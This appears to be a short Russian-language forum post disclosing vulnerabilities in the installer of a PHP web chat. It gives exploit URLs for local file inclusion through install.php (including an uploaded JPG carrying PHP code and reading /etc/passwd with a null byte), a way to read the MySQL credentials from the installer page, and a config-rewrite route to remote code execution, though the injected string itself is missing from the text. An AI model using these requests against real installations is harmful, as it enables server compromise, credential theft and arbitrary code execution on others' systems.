Пришлось по работе поковыряться - слил эту версию и по-быстрому просмотрел только процесс инсталляции, так что это типа признания, что я вообще весь чат не смотрел, а только мельком.

1) LFI (need: magic_quotes=off)

Бажный файл: install.php
В чате можно заливать свой фон для окна чата в формате JPG. Заливаем фон-картинку со своим пхп-кодом и он кладётся сюда: \images\cust_img\

Т.о. пример эксплоита выглядит так:
/install.php?step=/../../images/cust_img/5f_121171317514078.jpg%00

или так:

/install.php?step=/../../../../../../../../../etc/passwd%00

2) Conf read
Вот так читается уже прописанные данные для мускуля в конфиге:

/install.php?step=2

Смотрим сорец и видим пасс за звёздочками, юзера, бр и сервер.. ну всё как пологается вобщем.

3) Cod exec (need: magic_quotes=off)
Ну а тут основано на втором этапе. Конфиг этот можно переписать (если ест ьправа на запись. если их нет - чат выдаст предупреждение что нет прав). Т.о. идём:

/install.php?step=2

и в префикс ДОПИСЫВАЕМ следующее (т.е. то что там было - не стираем):

После этого выполняем код вот так:
/inc/config.srv.php?o=[your_eval_code]